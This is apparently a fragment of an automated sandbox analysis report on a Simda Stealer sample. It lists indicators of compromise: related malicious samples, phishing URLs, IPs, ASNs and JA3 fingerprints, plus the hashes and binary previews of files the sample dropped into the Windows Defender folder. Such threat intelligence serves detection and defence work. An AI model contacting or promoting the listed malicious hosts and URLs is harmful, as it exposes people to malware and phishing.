                                                                                                                                                                                                            • 199.59.243.226
                                                                                                                                                                                                            pupycag.comuB31aJH4M0.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • 18.208.156.248
                                                                                                                                                                                                            M62eQtS9qP.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • 18.208.156.248
                                                                                                                                                                                                            Bonelessness.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • 18.208.156.248
                                                                                                                                                                                                            roundwood.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • 18.208.156.248
                                                                                                                                                                                                            spug64.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • 34.174.78.212
                                                                                                                                                                                                            10627546311.zipGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • 199.21.76.77
                                                                                                                                                                                                            pupydeq.comuB31aJH4M0.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • 13.248.169.48
                                                                                                                                                                                                            M62eQtS9qP.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • 13.248.169.48
                                                                                                                                                                                                            Bonelessness.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • 13.248.169.48
                                                                                                                                                                                                            roundwood.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • 13.248.169.48
                                                                                                                                                                                                            spug64.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • 13.248.169.48
                                                                                                                                                                                                            aAP32K91Qx.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • 194.195.211.98
                                                                                                                                                                                                            0HVVcaZuD1.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • 194.195.211.98
                                                                                                                                                                                                            iN9u7DdJv4.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • 194.195.211.98
                                                                                                                                                                                                            szLAUZKesq.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • 194.195.211.98
                                                                                                                                                                                                            JevgQ6OvYY.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • 194.195.211.98
                                                                                                                                                                                                            lyvyxor.comuB31aJH4M0.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • 208.100.26.245
                                                                                                                                                                                                            M62eQtS9qP.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • 208.100.26.245
                                                                                                                                                                                                            Bonelessness.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • 208.100.26.245
                                                                                                                                                                                                            roundwood.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • 208.100.26.245
                                                                                                                                                                                                            spug64.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • 208.100.26.245
                                                                                                                                                                                                            kz2xIsjyEH.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • 208.100.26.245
                                                                                                                                                                                                            10627546311.zipGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • 208.100.26.245
                                                                                                                                                                                                            aAP32K91Qx.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • 208.100.26.245
                                                                                                                                                                                                            0HVVcaZuD1.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • 208.100.26.245
                                                                                                                                                                                                            iN9u7DdJv4.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • 208.100.26.245

                                                                                                                                                                                                            ASNs

                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                            NBS11696USuB31aJH4M0.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • 64.190.63.136
                                                                                                                                                                                                            firmware.armv4l.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 64.190.63.222
                                                                                                                                                                                                            firmware.armv5l.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 64.190.63.222
                                                                                                                                                                                                            firmware.armv7l.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 64.190.63.222
                                                                                                                                                                                                            firmware.i586.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 64.190.63.222
                                                                                                                                                                                                            firmware.i686.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 64.190.63.222
                                                                                                                                                                                                            firmware.mipsel.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 64.190.63.222
                                                                                                                                                                                                            firmware.sh4.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 64.190.63.222
                                                                                                                                                                                                            firmware.x86_64.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 64.190.63.222
                                                                                                                                                                                                            http://e.r.roGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 64.190.63.210
                                                                                                                                                                                                            LIQUIDWEBUSIEry29c3sb.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                                                                                            • 67.225.141.34
                                                                                                                                                                                                            uB31aJH4M0.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • 72.52.179.174
                                                                                                                                                                                                            http://govedge.filegear-de.meGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 69.16.231.61
                                                                                                                                                                                                            NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXEGet hashmaliciousAgentTesla, RedLineBrowse
                                                                                                                                                                                                            • 72.52.178.23
                                                                                                                                                                                                            https://emyoo.com.au/wp-includes/Text/Diff/Renderer/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                            • 209.59.186.101
                                                                                                                                                                                                            https://clarity-financial.com.au/wp-includes/widgets/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 209.59.186.101
                                                                                                                                                                                                            RE_.msgGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                            • 209.59.186.101
                                                                                                                                                                                                            https://rivercliff.com/global/efm/doneGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                            • 209.59.186.101
                                                                                                                                                                                                            0XLuA614VK.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                            • 72.52.178.23
                                                                                                                                                                                                            firmware.armv4l.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 67.227.154.36
                                                                                                                                                                                                            TANDEMUShttps://amazon-103093.weeblysite.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 15.197.193.217
                                                                                                                                                                                                            https://amazon-102823.weeblysite.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 15.197.193.217
                                                                                                                                                                                                            https://amazon-103409.weeblysite.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 15.197.193.217
                                                                                                                                                                                                            https://amazon-101745.weeblysite.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 15.197.193.217
                                                                                                                                                                                                            https://amazon-103277.weeblysite.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 15.197.193.217
                                                                                                                                                                                                            v548OdIeBZ.exeGet hashmaliciousMyDoomBrowse
                                                                                                                                                                                                            • 15.198.14.122
                                                                                                                                                                                                            https://amazon-102007.weeblysite.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 15.197.193.217
                                                                                                                                                                                                            https://amazon-101490.weeblysite.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 15.197.193.217
                                                                                                                                                                                                            https://amazon-101953.weeblysite.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 15.197.193.217
                                                                                                                                                                                                            https://amazon-100887.weeblysite.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 15.197.193.217
                                                                                                                                                                                                            AMAZON-AESUS2zYqUnx8qs.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 44.221.84.105
                                                                                                                                                                                                            QTCc6zXJy3.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 44.221.84.105
                                                                                                                                                                                                            https://amazon-104169.weeblysite.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 50.19.89.137
                                                                                                                                                                                                            https://amazon-103674.weeblysite.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 50.19.89.137
                                                                                                                                                                                                            https://amazon-103974.weeblysite.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 3.233.158.30
                                                                                                                                                                                                            https://conecctwvallete.gitbook.io/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 52.200.196.77
                                                                                                                                                                                                            https://amazon-103093.weeblysite.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 54.235.101.7
                                                                                                                                                                                                            https://conecctwvallete.gitbook.io/usGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 44.206.193.225
                                                                                                                                                                                                            https://amazon-102823.weeblysite.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 54.235.101.7
                                                                                                                                                                                                            https://amazon-104501.weeblysite.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 3.233.158.31

                                                                                                                                                                                                            JA3 Fingerprints

                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                            37f463bf4616ecd445d4a1937da06e19#U4e0b#U8f7d-doc-uninsta.exeGet hashmaliciousGhostRatBrowse
                                                                                                                                                                                                            • 188.114.96.3
                                                                                                                                                                                                            #U67e5_-uninstall.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 188.114.96.3
                                                                                                                                                                                                            SecuriteInfo.com.Adware.DownwareNET.4.3128.32406.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 188.114.96.3
                                                                                                                                                                                                            SecuriteInfo.com.Adware.DownwareNET.4.3128.32406.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 188.114.96.3
                                                                                                                                                                                                            app__v6.15.9_.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 188.114.96.3
                                                                                                                                                                                                            rfq_last_quater_product_purchase_order_import_list_09_06_2024_00000024.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                                                                                            • 188.114.96.3
                                                                                                                                                                                                            rfq_last_quater_product_purchase_order_import_list_09_05_2024_00000024.cmdGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                                                                                            • 188.114.96.3
                                                                                                                                                                                                            uB31aJH4M0.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • 188.114.96.3
                                                                                                                                                                                                            SecuriteInfo.com.Win64.PWSX-gen.14334.8980.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 188.114.96.3
                                                                                                                                                                                                            M62eQtS9qP.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • 188.114.96.3

                                                                                                                                                                                                            Dropped Files

                                                                                                                                                                                                            No context

                                                                                                                                                                                                            Created / dropped Files

                                                                                                                                                                                                            C:\Program Files (x86)\Windows Defender\galynuh.com

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):593
                                                                                                                                                                                                            Entropy (8bit):7.626935561277827
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:NXnYWSLEmM3e7/EzZUimtdHCD6B+HAwQ0m7xs01O58/fTU6i0rSZd09LQ:FYWSLdM3CENUJtd85IsWO58NGd09k
                                                                                                                                                                                                            MD5:926512864979BC27CF187F1DE3F57AFF
                                                                                                                                                                                                            SHA1:ACDEB9D6187932613C7FA08EAF28F0CD8116F4B5
                                                                                                                                                                                                            SHA-256:B3E893A653EC06C05EE90F2F6E98CC052A92F6616D7CCA8C416420E178DCC73F
                                                                                                                                                                                                            SHA-512:F6F9FD3CA9305BEC879CFCD38E64111A18E65E30D25C49E9F2CD546CBAB9B2DCD03ECA81952F6B77C0EAAB20192EF7BEF0D8D434F6F371811929E75F8620633B
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:....tp.-$|e.V...(.m.y;.;..>...O`.<.]..&@...0..P....:.(...{i1r....H...i......=$.<.v&1...%e..r..(}b;.U...A.f..K8S.9IM.R.....!.._.....N':.. ..s..!IX..ZK..q..T..v.%.....0...fn.........b...../...\..O8....M...i.ZF.r.C.)~qO..T..{...x..g.......$.t.m;..|.R.33...; ...N.#..rN.A.c.D.w.?0.%D.i..1...5..[.,......ir.Z.`.....+.8..Y.....'>./l..qZ..#1F..F...=./,.&.....e.Q..$.mZZAZ........P...=T.u.H]^n|..h_s.n....r..I..U.T..%N$.B..jj.\..*...Z.';-.....5...#..u.P..k...\..:.'..l8n<C.s.SJ..4....%OE.L2..Ir....U...d.CP....m<.TG?.u..iLj*....H.H...?G..*O..tE..9..%.<+<......_.w..*S....

                                                                                                                                                                                                            C:\Program Files (x86)\Windows Defender\lysyfyj.com

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):481
                                                                                                                                                                                                            Entropy (8bit):7.515128020783169
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:NGjx1vBGFaAKSM9xELExl+g8XllLdIdiLuAJDCLf6L:MfvsFDKPnELESl2dzAJD4E
                                                                                                                                                                                                            MD5:2DFDCC1880C422772CB67B200D395C82
                                                                                                                                                                                                            SHA1:F5999AE27CDE7F72DF14B6C1C97B9AF8698615B3
                                                                                                                                                                                                            SHA-256:F5C4402D1A9267B173F96AA67BDADBAB16CC16049768C5644817FEAA63862D7F
                                                                                                                                                                                                            SHA-512:6D0B98CE04F6DC81FE801255DB4A231522B9E73BCC27F882509A35F52FC97C649F2B0DCB04E0C55EA33068235DBECAE58B4FBD73C77695C8E3BBD1B0F5095CAA
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:....tp.y)x`.T...x.6.wz.&.=Y..M4.".....+.....+.AQ....8.5...n',)...Q...k....C%!.;.l*}..m#.=..R-a7...o....*...L.?.sG..Z.Y....f.....D...#=.....D...^."..."..0>.Y..z0L....N{.VB+......4.@..N..=.v.:...:.(..m..iHy..e,y.(pU}.r...B...Y.H?.+..?../.\..X.k>...qz..3>...R..."f.|..^.~.|..$..}.Jr.*...}..>..E...:..k|............_.R....{...?..GA..eC(\.W...)... 4......n^=.}g..J*S..|...0...`....g.9Z..'.i.zp7..$......s.....DV...cC2..^.{{....).8...}+8C..S.z...v..t;C..R_......$.(...ej

                                                                                                                                                                                                            C:\Program Files (x86)\Windows Defender\lyxynyx.com

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1226
                                                                                                                                                                                                            Entropy (8bit):7.857422787626542
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:IZsdS4WfwNaWJxezuQj1kZ8l9KfPqiHsHGstk4qtrZyrTduF1Wk:QsS4QWJxez1Rg8yimstk4OrZsduh
                                                                                                                                                                                                            MD5:E3B2EBB89A4778A8AB8ECBCD02A5E96C
                                                                                                                                                                                                            SHA1:A11A07348EF33664E4F259733E07EE54EA2992D9
                                                                                                                                                                                                            SHA-256:022E2FF126CC9E2B20F9A54444C37DFF86A5C309FB2C5383E50381001147BCAC
                                                                                                                                                                                                            SHA-512:2F021C78A7E7BF8EAD518AA82697FBF7048A9871BB2BBB65F68A86C389603BBDC4C2D0FB222A11074ACE20DAD46B380D03D7A7BE4F360176224E29139259642D
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:...{:.a)9l.....(.|.t;....>....V>.%.B...........%$......P...J^X*..q....z...<.%...U<e..U9.y".[.F7..r5....=.;ZO..*./.......%....}..~:...3;.s...s/2../....2.f..F<w...Z..'.*......6(.K......i.\..c.....o....I.d=.t0...EkP.....@...%.rJ.. .......s.(V..~...}t...0l...D.).Ju.X..c.B.|.lv....5h.:...}...."..R.|g...?.....).2A......op.,8..{Z..7..O.....i..-7.:....[`Q..Pb.(.....L......L...5]W&X...s6..B_s.n......r..._.EZ...m.a._..+>.FO...9.G./u;G..\.`.....7.v..g g./.._.`...H.\.".;x2#..Uj..U.g.c..-@.....O...9..+gn..~y.Asx.>......^..w..+.J.....8!.WaO.0Q.xk..e.1<6...s..[...=.Rv..@...b.i.-.mp....+..x.#..p~.4D(.!.......r..y.B6.....p.c.b.+.e.L....!.E/N;3.x...P=........R..... ..X.-..s. .&.._6z....^......,.p..|......2......&.....-|p....@A..Y/M....."..............?...).9>.6..;R*..|........|.N>.*.$.d..aZ...R2#:\....+x.4S.^.._....p....m...&....(.9....kRNM...M.....#.ER.....o.........tK.......O........4..8%.....Y.3Rw.$.........f1..d.ZR....w.K..(. ....AGo.k......x.8..

                                                                                                                                                                                                            C:\Program Files (x86)\Windows Defender\pupydeq.com

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):114
                                                                                                                                                                                                            Entropy (8bit):6.479691220248167
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:elfPZkATGqaNh/bf4/o/flD2qNJ5ZmANv:elfhkVNh/L4kl2qNJ5ZmAx
                                                                                                                                                                                                            MD5:BFDE1E9E9C32C1681A16139450C6909D
                                                                                                                                                                                                            SHA1:7E669B927E6A75A10A0CA29E38E58DDCB49B725E
                                                                                                                                                                                                            SHA-256:E0D020BA1CB6506CEE234903A44C747EE0CFA7E2D1E60029E4CD8DE9A431512A
                                                                                                                                                                                                            SHA-512:781FD54F155442DD34F9919B3CD063EE399DB411BBFE15F2BDC43D3AB8AC2D04E1011B2C99FAB42BEBF7B903A94E09AAAEF71B7A465D2D04B417F6DAD8E8E396
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:...[..A.9l.....|.e.&'.*.-K...P-.p.R...9L....%........'.=...bto2..X...f.....@pg.>..ac...69..z...}/<.MF9...h..

                                                                                                                                                                                                            C:\Program Files (x86)\Windows Defender\qetyhyg.com

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):593
                                                                                                                                                                                                            Entropy (8bit):7.626935561277827
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:NXnYWSLEmM3e7/EzZUimtdHCD6B+HAwQ0m7xs01O58/fTU6i0rSZd09LQ:FYWSLdM3CENUJtd85IsWO58NGd09k
                                                                                                                                                                                                            MD5:926512864979BC27CF187F1DE3F57AFF
                                                                                                                                                                                                            SHA1:ACDEB9D6187932613C7FA08EAF28F0CD8116F4B5
                                                                                                                                                                                                            SHA-256:B3E893A653EC06C05EE90F2F6E98CC052A92F6616D7CCA8C416420E178DCC73F
                                                                                                                                                                                                            SHA-512:F6F9FD3CA9305BEC879CFCD38E64111A18E65E30D25C49E9F2CD546CBAB9B2DCD03ECA81952F6B77C0EAAB20192EF7BEF0D8D434F6F371811929E75F8620633B
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:....tp.-$|e.V...(.m.y;.;..>...O`.<.]..&@...0..P....:.(...{i1r....H...i......=$.<.v&1...%e..r..(}b;.U...A.f..K8S.9IM.R.....!.._.....N':.. ..s..!IX..ZK..q..T..v.%.....0...fn.........b...../...\..O8....M...i.ZF.r.C.)~qO..T..{...x..g.......$.t.m;..|.R.33...; ...N.#..rN.A.c.D.w.?0.%D.i..1...5..[.,......ir.Z.`.....+.8..Y.....'>./l..qZ..#1F..F...=./,.&.....e.Q..$.mZZAZ........P...=T.u.H]^n|..h_s.n....r..I..U.T..%N$.B..jj.\..*...Z.';-.....5...#..u.P..k...\..:.'..l8n<C.s.SJ..4....%OE.L2..Ir....U...d.CP....m<.TG?.u..iLj*....H.H...?G..*O..tE..9..%.<+<......_.w..*S....

                                                                                                                                                                                                            C:\Program Files (x86)\Windows Defender\qexyhuv.com

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):114
                                                                                                                                                                                                            Entropy (8bit):6.479691220248167
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:elfPZkATGqaNh/bf4/o/flD2qNJ5ZmANv:elfhkVNh/L4kl2qNJ5ZmAx
                                                                                                                                                                                                            MD5:BFDE1E9E9C32C1681A16139450C6909D
                                                                                                                                                                                                            SHA1:7E669B927E6A75A10A0CA29E38E58DDCB49B725E
                                                                                                                                                                                                            SHA-256:E0D020BA1CB6506CEE234903A44C747EE0CFA7E2D1E60029E4CD8DE9A431512A
                                                                                                                                                                                                            SHA-512:781FD54F155442DD34F9919B3CD063EE399DB411BBFE15F2BDC43D3AB8AC2D04E1011B2C99FAB42BEBF7B903A94E09AAAEF71B7A465D2D04B417F6DAD8E8E396
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:...[..A.9l.....|.e.&'.*.-K...P-.p.R...9L....%........'.=...bto2..X...f.....@pg.>..ac...69..z...}/<.MF9...h..

                                                                                                                                                                                                            C:\Program Files (x86)\Windows Defender\vofycot.com

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):25275
                                                                                                                                                                                                            Entropy (8bit):7.979791890880129
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:CARva/n308n02AARP+6VWq1iGSwUl52IBscal5Ymj9DETgx+2dVSuMvjUP8Z31W8:C4ak8nKaPP1ha5uvbY0H+UDMwPbBU
                                                                                                                                                                                                            MD5:587F7E1ABA635FF43C46A794050A001A
                                                                                                                                                                                                            SHA1:4A63E0CCD895E0AB907C117982976BB69C887E56
                                                                                                                                                                                                            SHA-256:6EBA9A77CBD3C682522A62FBF67F21C7112BD728C2693E6AD19CAFF87C61B433
                                                                                                                                                                                                            SHA-512:D822DC79D229BC9AD72AF8B456A82CBDBBE2DE2C702F181562E51E8758DEB42683905E107ABCB5BE30DC89064C90FA84605D583FEDC8DF7AF4D72FD559D088E4
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:...[..A.9l.....|.e.8w.!..1.....9.:....".....=..9.......z...}yE.....j...I.....<.&.3.l6g...q...d^.X.K6.g`a..;.F.2Sdo.}8..U.g;...H.L.....A.....y.....v.[..K'..."..r..Z2r.....%g.Z.?......<5.2../..&...G..j.....L...dE~1.u4pW.]NK.M...FX.N.Nz.)8....{.#.'t.Y.t..Cq..`r..Y.p..c....p.D.l.n .)..%..l...p.....a......h...e....g.<.......;). ?..zI..kW.......&.. :.>.....tW..j:.".........T...M... X.;.TB.'s.^vC>.:.....=..R..VZ..%.k..].>w..O.;.a.R.!-<.....$...$..f4...G.C..R.w.....dyn:....BD..aZ...v.G.C#...l......w.TW.RO.k<.KA.....'./d.. ....H......am.J*...|..d|..|.9 6...x......0.Ww.....l.h.j.m-...~..+.#..v{.*!r.=..^....{.M..H....<?.v.1.h.b.x......n+V#Jo-.6..D._-...SZ....I...~.o..I...;.u.*....n.+.......+FA..mc....:Im.S..8..>....d.Id......zK..qtqH...;..........Z..V/..e9..r..Qw.....k\......M.f#.Xi.D.M....t....RWf&hV...in.Lk...=....x....l.........m&..A(t.............dGs....`....).A.w}..I6..=p.........r..R......s.!%C.;........z...[.Z.....Z.e..).(...#/.G.c......Z(.c..

                                                                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_cUKxeliGgCix.exe_a7132afd10b1ed0cae2dbbe315e9f4129aed1a7_f206f5a2_13316e58-efdf-4217-8ef0-a322975a41ab\Report.wer

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):65536
                                                                                                                                                                                                            Entropy (8bit):0.9331955324621825
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:8XoeLIwO0BU/4gojRJkVzuiFgZ24IO8/kW:7Dw1BU/4gojPczuiFgY4IO8/k
                                                                                                                                                                                                            MD5:BEE435A234ABCD767FF9CADA505BC027
                                                                                                                                                                                                            SHA1:2AE393A825B5646022025D4632BF210C7D44AA04
                                                                                                                                                                                                            SHA-256:13D2FB419978EEE03B92CEB2222A478F39B4EC1D1508A56F2C9E7CDD91AE02C2
                                                                                                                                                                                                            SHA-512:DD820E927D3505BCFE744B5451D4933DFF74102F91BF099D3F7B2AA0A05748A8C0487E9EA7FBE55D7454BC2656F0ED327F2F092C447DC50A4C638198D3525295
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.0.2.5.2.3.5.8.0.7.2.9.2.8.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.0.2.5.2.3.5.9.2.9.1.6.7.1.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.3.3.1.6.e.5.8.-.e.f.d.f.-.4.2.1.7.-.8.e.f.0.-.a.3.2.2.9.7.5.a.4.1.a.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.9.5.0.0.4.b.1.-.5.f.8.d.-.4.6.3.8.-.b.c.7.6.-.d.4.d.c.9.0.0.5.3.1.f.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.c.U.K.x.e.l.i.G.g.C.i.x...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.4.0.-.0.0.0.1.-.0.0.1.4.-.7.9.c.a.-.1.b.8.8.b.c.0.1.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.e.8.9.5.7.1.a.d.2.4.7.d.2.d.7.b.6.5.6.3.2.3.c.b.9.4.9.1.b.8.1.1.0.0.0.0.f.f.f.f.!.0.0.0.0.5.5.3.6.b.7.5.3.2.4.0.0.b.a.f.2.7.b.e.b.2.b.f.d.4.2.5.1.5.9.2.6.4.a.d.7.1.1.3.6.!.c.U.K.x.e.l.i.G.g.C.i.x...e.x.e.....T.a.r.g.e.

                                                                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_cUKxeliGgCix.exe_a7132afd10b1ed0cae2dbbe315e9f4129aed1a7_f206f5a2_6670a2f9-3bc3-45bc-a1c4-002a2c6c0343\Report.wer

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):65536
                                                                                                                                                                                                            Entropy (8bit):0.9402738305754652
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:iswoeLIPoO0BU/4gojRJk1zuiFgZ24IO8/k:FtDg1BU/4gojPczuiFgY4IO8/k
                                                                                                                                                                                                            MD5:D8BC7EB3CF9329C116A931F76038EE7A
                                                                                                                                                                                                            SHA1:E5A428EBB166D982BB5B1A27EC68825F8B0684E7
                                                                                                                                                                                                            SHA-256:1383ACE8D0537132C171B79607FBC5F021DF0950A1FEA64435737B41CBA88128
                                                                                                                                                                                                            SHA-512:5B086C519F1E80A2C71D5A9FBDF9EDEBA09BD419B4626FCFE3904EB9EA04F18C7A3C3FB4776D0BE9FE43BE4FA47A9EE8335ECA00C1570D10415EE003B0169517
                                                                                                                                                                                                            Malicious:true
